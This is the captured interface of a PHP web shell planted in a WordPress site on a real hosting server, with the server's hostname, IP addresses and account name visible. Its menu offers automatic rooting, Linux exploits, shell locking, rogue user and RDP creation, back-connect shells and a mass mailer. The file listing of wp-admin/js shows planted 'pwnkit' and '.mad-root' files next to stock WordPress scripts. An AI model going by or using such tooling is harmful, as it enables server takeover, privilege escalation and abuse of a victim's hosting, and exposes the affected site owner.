Linux webm001.cluster105.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.105.20.1 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.0.30
afriquejlc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
afriquejlc /
poreckgroup /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
application-passwords.js
6.24
KB
-rw-r--r--
custom-background.min.js
1.18
KB
-rw-r--r--
customize-controls.js
287.36
KB
-rwxr-xr-x
customize-widgets.min.js
27.41
KB
-rwxr-xr-x
editor.min.js
12.76
KB
-rwxr-xr-x
farbtastic.js
7.67
KB
-rw-r--r--
image-edit.js
39.98
KB
-rwxr-xr-x
media.js
6.61
KB
-rwxr-xr-x
plugin-install.min.js
2.35
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
set-post-thumbnail.js
876
B
-rw-r--r--
tags-box.js
10.88
KB
-rw-r--r--
user-suggest.min.js
676
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : set-post-thumbnail.js
/** * @output wp-admin/js/set-post-thumbnail.js */ /* global ajaxurl, post_id, alert */ /* exported WPSetAsThumbnail */ window.WPSetAsThumbnail = function( id, nonce ) { var $link = jQuery('a#wp-post-thumbnail-' + id); $link.text( wp.i18n.__( 'Saving…' ) ); jQuery.post(ajaxurl, { action: 'set-post-thumbnail', post_id: post_id, thumbnail_id: id, _ajax_nonce: nonce, cookie: encodeURIComponent( document.cookie ) }, function(str){ var win = window.dialogArguments || opener || parent || top; $link.text( wp.i18n.__( 'Use as featured image' ) ); if ( str == '0' ) { alert( wp.i18n.__( 'Could not set that as the thumbnail image. Try a different attachment.' ) ); } else { jQuery('a.wp-post-thumbnail').show(); $link.text( wp.i18n.__( 'Done' ) ); $link.fadeOut( 2000 ); win.WPSetThumbnailID(id); win.WPSetThumbnailHTML(str); } } ); };
Close